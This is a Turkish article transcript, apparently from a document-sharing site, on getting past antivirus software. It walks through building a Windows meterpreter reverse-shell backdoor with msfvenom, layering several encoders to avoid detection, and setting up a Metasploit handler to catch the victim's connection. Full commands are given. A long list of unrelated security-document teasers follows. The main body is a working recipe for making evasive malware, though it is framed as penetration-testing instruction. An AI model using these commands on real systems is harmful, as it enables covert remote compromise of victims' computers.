Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.
|
|
- Ata Solak
- 7 yıl önce
- İzleme sayısı:
Transkript
1 Anti-Virüs Atlatma 1 Merhaba, Anti-virüs bypass işlemleri sırasında kullanılan araçların anlatılmasını içerecek olan bu makale, yazı dizisi şeklinde olacaktır. Her yazıda farklı bir anti-virüs bypass aracı anlatılacaktır. İlk olarak, bu makalede, Metasploit Framework ün kendi içerisinde bulunan Encode Modülleri kullanılacaktır. Sızma testleri sırasında veya sosyal mühendislik saldırılarında, kurban kişisinin bilgisayarında Metasploit in ajanı olan meterpreter ile shell alınmak istenebilir. Meterpreter, üstünde çok sayıda post-exploit modülü bulunduran, sızma testleri sırasında işleri oldukça kolaylaştıran bir Metasploit ajanıdır. Başlangıç olarak Metasploit Framework yardımıyla bir arka kapı oluşturacağız. Oluşturulan arka kapı Windows makineler için üretilmiştir ve reverse bağlantı ile 5566 portu üzerinden bizimle bağlantı kuracaktır. Saf bir şekilde üretilen (herhangi bir encode işlemine tabi tutulmamış) zararlı yazılımın online olarak virüs taramasından geçirilmiş sonucu aşağıdadır. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.
2 Msfvenom Msfvenom, Metasploit Framework ün arka kapı, shellcode üretmek, encode işlemleri için kullanılan aracıdır. Öncesinde msfpayload ve msfencode ile ayrı ayrı yapılan bu işlemler artık msfvenom ile tek bir seferde gerçekleştirilebilir. Msfvenom içerisinde bulunan encoder lar msfvenom list encoders komutuyla listelenebilir. Görüntülenen encoder ların güç dereceleri rank alanının altında bulunan bölümde belirtilmiştir. Resimden anlaşılacağı üzere excellent derecesinde iki tane encoder bulunmaktadır. Bunlar ; cmd/powershell_base64 x86/shikata_ga_nai Bunları teker teker deneyip sonuçları test edeceğiz.
3 Encoder : cmd/powershell_base64 Msfvenom ile üretilen arka kapıyı oluşturma sırasında encode işlemi uygulamak için -e veya encode parametresi kullanılabilir. Encode işlemini birden çok defa uygulamak için -i veya iterations parametresi kullanılabilir. Biz ilk olarak oluşturacağımız arka kapıyı cmd/powershell_base64 encoder i ile 5 defa encode edecek şekilde oluşturalım. Bu tarz işlemler çokça yapıldığı ve aynı formatta olduğu için
4 anti-virüs yazılımları imza veritabanlarına bunları eklemişlerdir. Bundan kaçınmak için aynı zararlıyı birden çok defa farklı encoder lar ile encode etmek gerekebilir. Bunu yapabilmek için Msfvenom dan elde edeceğimiz çıktıyı bir sonraki msfvenom komutuna pipe etmek gerekiyor. Bu şekilde birden çok encode tekniği ve iterasyonu ile anti-virüslere yakalanma ihtimali düşebilir. Aşağıdaki resimde oluşturulan zararlı yazılım 3 farklı encode tekniği ile encode edilmiştir. İlk durumda cmd/powershell_base64, ikinci durumda cmd/echo ve üçüncü durumda x86/shikata_ga_nai ile encode edilmiştir. Encode işlemi sırasında 5 ve 10 ar defalık iterasyonlarla encode işlemi gerçekleştirilmiştir. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5566 -f raw -e cmd/powershell_base64 -i 5 msfvenom platform windows -a x86 -e cmd/echo -i 10 -f raw msfvenom -e x86/shikata_ga_nai -i 10 platform windows -a x86 -f exe -o backdoor_encode_multi_shikata.exe Reverse Meterpreter Shell Yapılan işlemlerden sonra arka kapıyı kullanıcıya bir şekilde açtırdığımızı varsayarak aşağıdaki işlemleri yapıp, açılacak olan Meterpreter shellini beklemeye koyulabiliriz. Bunun için Metasploit in içerisinde yer alan ve gelecek bağlantıları
5 yakalamaya yarayan handler i kullanmamız gerekmektedir. Sırasıyla aşağıdaki komutlar girilmiştir ve gelecek bağlantılar beklenmektedir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 5566 set exitonsession false exploit -j -z Yukarıdaki işlemler sırasında yapılanların açıklamalarına gelecek olursak, klasik olan multi/handler i kullanıp, payload olarak arka kapıyı oluşturma sırasında kullandığımız payload ı atayıp, bu payload a ait parametreleri(lhost, LPORT) girmek, exitonsession parametresi ile ilk bağlantıdan sonra gelecek olan bağlantıları da beklemesini sağlamak ve bunları bir job haline getirip dinlemeyi başlatmak. İşlemlerin gerçekleştirilmesi sonrasında alınmış bir ekran görüntüsü aşağıdadır. Kurban, oluşturulan zararlı yazılımı açtıktan sonra Meterpreter Shell imiz geliyor, fakat buna otomatik bir geçiş yapmıyor. Bunun nedeni dinlemeyi yaptığımız sırada exploit komutuna verdiğimiz -z parametresidir. Bu parametre gelecek bağlantı ile direk bağlantı kurmaz, oluşturulan session lar içerisine ekler. Sessions komutu ile hali hazırda bağlantıları
6 kurulmuş olan session ları görebiliriz. Gelen bağlatıların görüntülenmesi ve o session a geçiş yapılması sonrasında bağlantının kurulduğu bilgisayar hakkındaki bilgilerin listelenmesi işlemleri aşağıdaki resimde gösterilmiştir.
Anti-Virus Atlatma - Maligno Kullanımı
Anti-Virus Atlatma - Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource
DetaylıAnti-Virüs Atlatma 3. Kurulum
Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.
DetaylıAnti-Virüs Atlatma 2. Kurulum
Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan
DetaylıAnti-Virus Atlatma Maligno Kullanımı
Anti-Virus Atlatma Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource
DetaylıHAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ
HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ SİSTEM HACKİNG: Windows Sistem Güvenlik Denetimi: Security Account Manager:Güvenlik Hesabı Yöneticisi windows'da yer alan sunucularda
DetaylıSonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.
Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların
Detaylı06 - Bilgi Toplama ve Sosyal Mühendislik
BGM 553 - Sızma Testleri ve Güvenlik Denetlemeleri-I Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016 - Güz İçindekiler
DetaylıMetasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net
Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit
DetaylıMetasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit
DetaylıSonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.
Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların
DetaylıAnti-Virus Atlatma - Maligno Kullanımı
Anti-Virus Atlatma - Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource
Detaylı06 - Bilgi Toplama ve Sosyal Mühendislik
BGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2018 - Güz İçindekiler
DetaylıDüşünüyorum! Biraz tarihçe.. Maalesef yanılıyorsunuz.
Parolamın Güvenli Düşünüyorum! Olduğunu Maalesef yanılıyorsunuz. 1990 2010 yılları arasında edindiğiniz bilgiler, 8 karakter uzunluğunda ve rastgele büyük harf, küçük harf, rakam ve sembol içeren bir parolanın
DetaylıArmitage Nedir? Kullanım Öncesi
Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre
DetaylıMetasploit Framework ile Exploit Geliştirme. Fatih Özavcı Canberk Bolat
Metasploit Framework ile Exploit Geliştirme Fatih Özavcı Canberk Bolat Bilgi Güveniği Danışmanı Güvenlik Araştırmacısı fatih.ozavci at gamasec.net canberk.bolat at gmail dotcom gamasec.net/fozavci cbolat.blogspot.com
DetaylıExploitation Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı
Exploitation Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Tarih 1 İçerik Exploit ve Payload kavramları Exploit Veritabanları Exploit araçları (frameworks) Metasploit Framework
DetaylıExploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Exploit Geliştirme Altyapıları Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Önerilen Yazılımlar
DetaylıMICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI HALİL DALABASMAZ PENETRATION TESTING SPECIALIST ŞUBAT 2015 BGA BİLGİ GÜVENLİĞİ LİMİTED ŞİRKETİ WWW.BGA.COM.TR İÇİNDEKİLER 1. GİRİŞ... 1 2. MICROSOFT
DetaylıBilgi Güvenliği Semineri
Bilgi Güvenliği Semineri Kadir Has Universitesi Mühendislik Günleri '10 Etkinliği Bilgi Güvenliği Semineri Ozan UÇAR Certified Ethical Hacker mail@ozanucar.com Hacking Kültürü Hakkında Bilgisayar yeraltı
Detaylı04 - Veritabanı Sızma Testleri - 1
04 - Veritabanı Sızma Testleri - 1 BGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir
DetaylıADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ
1. GİRİŞ Bu yazıda, Metasploit exploit frameworkü üzerinde bulunan meterpreter paylodunun kullandığı bazı modüllerin özellikle ağda ve sistem üzerindeki etkileri araştırılmıştır. Bu konuda SANS'ın da yararlı
DetaylıGüvenlik Riskleri ve Saldırı Yöntemleri. Ozan UÇAR oucar@bga.com.tr Bilgi Güvenliği Akademisi (BGA)
Güvenlik Riskleri ve Saldırı Yöntemleri Ozan UÇAR oucar@bga.com.tr Bilgi Güvenliği Akademisi (BGA) Melike Pınar Koleji BURSA 2011 Hacking Kültürü Hakkında Bilgisayar yeraltı dünyası bir aynalı salondur.
Detaylıİstemci Tabanlı Saldırı Türleri. Ozan UÇAR ozan.ucar@bga.com.tr
İstemci Tabanlı Saldırı Türleri Ozan UÇAR ozan.ucar@bga.com.tr Kayseri 2012 Konuşmacı Hakkında Kıdemli Bilgi Güvenliği Danışmanı ve Eğitmen Bilgi Güvenliği AKADEMİSİ () PenetraPon Tester Blog Yazarı blog.bga.com.tr
DetaylıKomut Satırının Gücü Adına!
Komut Satırının Gücü Adına! Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012
DetaylıWindows Hacking - II
BGM 554 - Sızma Testleri ve Güvenlik Denetlemeleri-II Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016/2017 - Bahar
DetaylıEn bilindik truva atları Xtreme Rat ve Darkcomet Rattır.
Merhaba Arkadaşlar Türkçede Arka Kapı olarak geçen Backdoor kelimesine uzak olmadığımız gibi yakında değiliz. Arka Kapı terimi Matrixfilminde ki Seraph karakterinin anahtarla açtığı kapılardan ileri gitmiyor.
DetaylıYerel Ağlarda Port 139 ve Saldırı Yöntemi
Yerel Ağlarda Port 139 ve Saldırı Yöntemi Merhaba arkadaşlar. Gerek kitap hazırlığında olmam, gerekse de işlerimin oldukça yoğun olmasından dolayı, bir süredir makale yayınlayamadım. Bu süre boşluğunu
Detaylı[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ]
[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ] 1 GİRİŞ Bu döküman Web Uygulamalarında Kaynak Kod Analizi isimli yazı serisinin 2.
DetaylıNmap Sonuçlarının Yorumlanması
Nmap Sonuçlarının Yorumlanması Nmap normal, xml, script kiddie ve parse edilebilir olmak üzere 4 biçimde rapor üretebilmektedir. Sızma testleri bakış açısından nmap raporlarının yorumlanması oldukça büyük
DetaylıGüvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması. Akademik Bilişim Şubat 2006
Güvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması Akademik Bilişim Şubat 2006 Hakan Tağmaç htagmac@cisco.com Sistem Müh. 1 Bildiri Konusu Günümüzde klasik veri toplama
DetaylıSİBER ESPİYONAJ FAALİYETLERİ VE TÜRKİYE
SİBER ESPİYONAJ FAALİYETLERİ VE TÜRKİYE Türkiye, finansal amaçlı yapılan saldırıların yanı sıra konumu itibariyle Siber Espiyonaj faaliyetlerinin de hedefi oluyor. Özellikle bölgesel dinamiklerin ve politik
DetaylıNessus ile şirket içi pentest (Sızma)
Nessus ile şirket içi pentest (Sızma) Daha önceki makalelerimde hep kişisel bilgi güvenliği üzerine bilgiler vermekteydim. Bu makalemde birçok arkadaşın ısrarla istediği kurumsal yapılarda penetration
DetaylıHAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ
HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ BUFFER OVERFLOW: Buffer Nedir? Buffer yani tampon alan donanım aygıtları veya farklı hızlarda farklı öncelikleri olan program
DetaylıFABREKA YAZILIM ELEKTRONİK DANIŞMANLIK TİC. LTD. ŞTİ.
FABREKA YAZILIM ELEKTRONİK DANIŞMANLIK TİC. LTD. ŞTİ. VEBIAN V1.6 KURULUM DOKÜMANI 29.08.2015 İçindekiler Amaç ve Kapsam... 2 Sistem Gereksinimleri... 3 Kurulum Adımları... 4 Başlamadan Önce... 4 Kurulum
DetaylıKurulum ve Başlangıç Kılavuzu. DataPage+ 2012 için
DataPage+ 2012 için Son Güncelleme: 29 Ağustos 2012 İçindekiler Tablosu Önkoşul Olan Bileşenleri Yükleme... 1 Genel Bakış... 1 Adım 1: Setup.exe'yi Çalıştırın ve Sihirbazı Başlatın... 1 Adım 2: Lisans
Detaylı05 - Veritabanı Sızma Testleri
BGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2018 - Güz İçindekiler
DetaylıNA VNC SERVER KULLANIMI. Genel Bilgi NA VNC Server Ayarları
NA VNC SERVER KULLANIMI Genel Bilgi NA VNC Server Ayarları Genel Bilgi Bu dökümanda NA ekranlarda VNC Server kullanımı anlatılmıştır. VNC, Virtual Network Computing kelimelerinin baş harflerinin bir araya
Detaylıwww.bilgisayardedektifi.com Murat ÖZBEK
Problem: Hafıza Kartı Bilgisayara takıldığında karta format atılması gerektiği konusunda hata mesaj penceresi çıkıyor. Hafıza kartı Dijital Fotoğraf Makinesine ait ve içerisinde kurtarılması gereken dosyalar
DetaylıExploit.CVE-2012-0003 Analizi
Exploit.CVE-2012-0003 Analizi Celil ÜNÜVER cunuver [at] signalsec.com www.signalsec.com Hackerların yer altı dünyasında Patch Tuesday, Exploit Wednesday diye bir söz vardır. Microsoft Salı günü yamaları
DetaylıPEY-D810 SĠNYALĠZASYON SĠSTEMĠ
PEY-D810 SĠNYALĠZASYON SĠSTEMĠ AÇIKLAMALAR-KULLANIM-BAĞLANTILAR Sayfa 1 ĠÇĠNDEKĠLER SAYFA 1-) Sistemin Genel Tanıtımı 3 2-) Sistemin ÇalıĢma ġekli.4 3-) Sistem Yazılımı 5 4-) Sistemin Elektrik ve Bağlantı
DetaylıKurulum ve Başlangıç Kılavuzu. DataPage+ 2013 için
DataPage+ 2013 için En Son Güncellenme Tarihi: 25 Temmuz 2013 İçindekiler Tablosu Önkoşul Olan Bileşenleri Yükleme... 1 Genel Bakış... 1 Adım 1: Setup.exe'yi Çalıştırın ve Sihirbazı Başlatın... 1 Adım
DetaylıPlaceCam Video Konferans Görüntülü Görüşme Kullanıcı Kitapçığı
PlaceCam Video Konferans Görüntülü Görüşme Kullanıcı Kitapçığı 1 HAZIRLIK : WEBCAM ve KULAKLIKLI MİKROFON Bilgisayarınızın USB girişine web kameranızı (webcam) takın ya da var ise bilgisayarın kendi web
DetaylıBilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Bilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Bilgi Güvenliği Denetimi Kurumların sahip olduğu politikaların ve uygulamalarının, güvenlik
Detaylıhttp://www.microsoft.com/visualstudio/eng/downloads
Visual Studio 2012'nin kurulumunu, Visual Studio'nun kullanımını ve Windows Store'da basit bir proje hazırlanmasını anlatacağım. Hepsinden önce Visual Studio ortamından biraz bahsedelim. Visual Studio
DetaylıSIEMENS NX CAE YAZILIMLARI İÇİN COMPOSITE HOST ID VE MAC ADRESİ NASIL ÖĞRENİLİR?
SIEMENS NX CAE YAZILIMLARI İÇİN COMPOSITE HOST ID VE MAC ADRESİ NASIL ÖĞRENİLİR? HİZMETE ÖZEL Tura Akıllı Sistemler Mühendislik Enerji Elektronik Robotik ve İmalat Tic. Ltd. Şti. Sayfa:1/11 (Kapak Sayfası)
DetaylıBLIND SQL INJECTION SALDIRILARI
SALDIRILARI Emre Karadeniz OSCP İçindekiler BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri I. Blind SQL Injection (Content Based)... 2 II. Blind SQL Injection (Content-Based) Örneği... 3 III. Blind
DetaylıKATES Yazılım Güncelleme Dokümanı
KATES Yazılım Güncelleme Dokümanı Yazılım Güncelleme için aşağıdaki işlemler sırasıyla yapılmalıdır. 1. Gerekli Yazılımları ve Dokümanları İndirin 2. KATES i sürekli çalışma moduna alın. 3. Bluetooth bağlantısını
DetaylıÖzgür Yazılımlar ile Kablosuz Ağ Denetimi
Özgür Yazılımlar ile Kablosuz Ağ Denetimi Fatih Özavcı fatih.ozavci@gamasec.net Afşin Taşkıran afsin.taskiran@avea.com.tr Konular Kablosuz Ağ Güvenliği Kablosuz Ağ Güvenlik Denetim Süreci Denetim Kapsamının
Detaylıİşletim Sisteminin Temel İşlemleri
YAZILIM Yazılım Bilgisayar donanımının birbiri ile haberleşmesini, düzenli ve verimli çalışabilmesini sağlayan program topluluğudur. Bilgisayar yazılımları giriş birimlerinden alınan bilgilere hangi işlemlerin
DetaylıSaldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları
Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları 1. MAC adresleri kaç byte dır? 2. Aşağıdaki MAC adresi hangi firmaya aittir. 00:03:6C:1c:2c:3d 3. TCP SYN paketi kaç byte dır? 4. 100
DetaylıÖzgür Yazılımlarla Saldırı Yöntemleri. Fatih Özavcı fatih.ozavci at gamasec.net
Özgür Yazılımlarla Saldırı Yöntemleri Fatih Özavcı fatih.ozavci at gamasec.net 1 Başlıklar Bilgi Toplama ve Ağ Haritalama Ağ Servislerine Yönelik Saldırılar Yerel Ağ Saldırıları Kablosuz Ağ Saldırıları
DetaylıÖzgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Özgür Yazılımlar ile VoIP Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Konular VoIP Güvenliği VoIP Güvenlik Denetim Süreci Denetim Kapsamının Belirlenmesi Ağ Altyapısı Analizi
DetaylıKurumsal Güvenlik ve Web Filtreleme
S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 Yönetici olarak AntiKor a girmek için SshClient veya Putty programı kullanılır. IP olarak kurum içinden
DetaylıTele Satış Temsilcisi Eğitim Dökümanı
Tele Satış Temsilcisi Eğitim Dökümanı İçindekiler 1. Giriş Ekranı 2. Genel Görünüm 3. Dosyalar 4. Firmalar 5. Aramalar 6. Randevular 1. Giriş Ekranı RedCRM sistemine giriş için kullanılacak linkler: PC
DetaylıERBAA FEVZİ ÇAKMAK İLKOKULU Okul Müdür Yardımcısı Veysel KUL
KURUM YÖNETİCİSİ HAKKINDA Bilindiği üzere MEBBİS üzerinde tüm kurumlarımızın kurum kodu kullanıcı adı olmak üzere tek kullanıcı adı ve şifresi vardır. Kurumda çok sayıda kullanıcı personel olması halinde
DetaylıDatasoft Yazılım Genel Muhasebe Programı Muhasebe Fişlerinin Günlük Birleştirilmesini Açıklayan Kılavuz
Datasoft Yazılım Genel Muhasebe Programı Muhasebe Fişlerinin Günlük Birleştirilmesini Açıklayan Kılavuz Uygulamanın Đçeriği: Datasoft Yazılım Genel Muhasebe Programında muhasebe fişleri, oluşma kaynaklarına
DetaylıAPI v2 Multi Smart Card ( ) 4- VERİİMZA API ile bir web uygulaması nasıl haberleşir?
API v2 Multi Smart Card (24.11.2018) İÇİNDEKİLER : 1- VERİİMZA API nedir? 2- Neden VERİİMZA API? 3- VERİİMZA API nasıl çalışır? 4- VERİİMZA API ile bir web uygulaması nasıl haberleşir? 5- VERİİMZA API
DetaylıWindows 7'ye Format Atmak, XP Repair ve XP Kurmak
Bu yazımda Windows 7 işletim sisteminin nasıl kurulacağını adım adım resimlerle öğreneceğiz.. Kurulumdan önce yapmamız gereken bir kaç adım var. Öncelikle elimizde olması gerekenler: 1- Windows 7 CD' si
DetaylıKurumsal Güvenlik ve Web Filtreleme
S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 S a y f a 4 S a y f a 5 S a y f a 6 S a y f a 7 şeklini alır. Bu durumda kullanıcı yasaklı konumdadır.
DetaylıAğ Trafik ve Forensik Analizi
Ağ Trafik ve Forensik Analizi Zararlı Yazılım Analiz ve Mücadele Merkezi TÜBİTAK BİLGEM Siber Güvenlik Enstitüsü Ağ Forensik Analizi Tanım Bilgisayar ağlarının herhangi saldırıya karşın izlenmesi ve analiz
DetaylıSızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR ozan.ucar@bga.com.tr
Sızma Testlerinde İleri Düzey Teknikler Ozan UÇAR ozan.ucar@bga.com.tr Ankara 2012 Konuşmacı Hakkında Bilgi Güvenliği Danışmanı ve Eğitmen Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr) Penetration Tester
DetaylıUITSEC-CERT. PETYA RANSOMWARE TEKNİK DETAYLARI BİLGİNİZE SUNULMUŞTUR. Version:2.0
28.06.2017 13:30 UITSEC-CERT PETYA RANSOMWARE TEKNİK DETAYLARI BİLGİNİZE SUNULMUŞTUR. Version:2.0 Bu rapor Uluslararası Siber Güvenlik Federasyonu (USGF) için UITSEC tarafından hazırlanmıştır. Zararlı
DetaylıFırat Üniversitesi Hastanesi Dinamik Web Sayfası
Akademik Bilişim 09 - XI. Akademik Bilişim Konferansı Bildirileri 11-13 Şubat 2009 Harran Üniversitesi, Şanlıurfa Fırat Üniversitesi Hastanesi Dinamik Web Sayfası Ayhan Akbal 1, Erhan Akbal 2 1 Fırat Üniversitesi,
DetaylıORACLE TNS (TRANSPARENT NETWORK SUBSTRATE) LISTENER YAPILANDIRMASI
ORACLE TNS (TRANSPARENT NETWORK SUBSTRATE LISTENER YAPILANDIRMASI 1 Farklı ortamlardan, kurduğunuz veritabanına bağlanılması listener yapılandırmasıyla sağlanır. Genellikle standart olan ayarlarla 1521
Detaylıcofaso ile farkı yaşayın Şubat 2009 www.mertbilgi.com.tr
cofaso ile farkı yaşayın Şubat 2009 www.mertbilgi.com.tr cofaso ile farkı yaşayın Otomasyon ve pano projelerinizi profesyonel bilgisayar destekli mühendislik yazılımı (CAE) cofaso ile yönetin Giriş cofaso
DetaylıKoordinat Dönüşümleri (V )
KOORDİNAT DÖNÜŞÜMLERİ ve FARKLI KOORDİNAT SİSTEMLERİ İLE ÇALIŞMA FieldGenius ile birden fazla koordinat sistemi arasında geçiş yaparak çalışmak mümkündür. Yaygın olarak kullanılan masaüstü harita ve CAD
DetaylıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı Mesut Türk BGA Bilgi Güvenliği AKADEMİSİ www.bga.com.tr bilgi@bga.com.tr 1 İÇİNDEKİLER 1. Armitage i Tanıyalım.... 3 1.1. Genel Kavramlar.3
DetaylıTurquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe
1. Giriş Turquaz programını windows üzerinde çalıştırmak için öncelikle bilgisayarınızda postgresql ve Java nın kurulu olması gerekli. Aşağıdaki bilgi ve dökümanlar windows 2000 işletim sistemi üzerinde
DetaylıVeritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı
Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Tarih 1 Veritabanı Sızma Testleri Veritabanı sistemleri kritik sistemlerdir. Testler sonucunda elde
DetaylıTÜRK STANDARDLARI ENSTİTÜSÜ BİLİŞİM TEKNOLOJİLERİ TEST VE BELGELENDİRME DAİRESİ BAŞKANLIĞI SIZMA TESTİ UZMANI FAALİYETLERİ
TÜRK STANDARDLARI ENSTİTÜSÜ BİLİŞİM TEKNOLOJİLERİ TEST VE BELGELENDİRME DAİRESİ BAŞKANLIĞI SIZMA TESTİ UZMANI FAALİYETLERİ 1. EĞİTİM TARİHLERİ: Gelen talepler doğrultusunda planlanmaktadır. 2. EĞİTİM SAATİ:
DetaylıIceWarp kurulumu. IceWarp Server kurmanız için yapmamız gereken adımlar şunlardır:
IceWarp kurulumu IceWarp Server kurmanız için yapmamız gereken adımlar şunlardır: http://www. icewarp. com sitesinden,on line satış temsilicilerden ve ya da on line installer (online kurucusundan) istediğiniz
Detaylı2. dönem itibariyle ben de Zararlı Yazılım Analizi 101 dersi vererek bu programa katkıda bulunacağım.
Blog'um 4 Yaşında :) 19 Kasım 2009 tarihinde, Huzeyfe ÖNAL ın ısrarı üzerine (sağolsun) açmış olduğum blogum, bugün itibariyle 4. yılını doldurmuş bulunuyor. 4 yıl boyunca göstermiş olduğunuz ilgi, alaka,
DetaylıViproy Bilgi Güvenliği Eğitimleri Rehberi
Viproy Bilgi Güvenliği Eğitimleri Rehberi Viproy Eğitimleri Hakkında Temmuz 2006 itibariyle bağımsız bir şirket olarak kurulan GamaSEC Ltd, bilgi güvenliği denetimi ve danışmanlığı servisleri sunmakta,
DetaylıSqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
SqlMap Kullanımı Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. Temel olarak yaptığı işlem sizin belirtmiş olduğunuz parametrelere göre hedef
DetaylıArcGIS ile Su Yönetimi Eğitimi
ArcGIS ile Su Yönetimi Eğitimi http://facebook.com/esriturkey https://twitter.com/esriturkiye egitim@esriturkey.com.tr Kursun Süresi: 5 Gün 30 Saat ArcGIS ile Su Yönetimi Genel Bir platform olarak ArcGIS,
DetaylıFatura Dinamik Kodlama İyileştirmeleri
Fatura Dinamik Kodlama İyileştirmeleri Ürün Grubu Kategori Versiyon Önkoşulu [X] Redcode Enterprise [ ] Redcode Standart [ ] Entegre.NET [X] Yeni Fonksiyon 5.0 Uygulama Netsis paketlerinin tüm modüllerinin
DetaylıYENİ NESİL ÖKC İLE ON-LİNE İŞLEMLER (Hugin / Profilo)
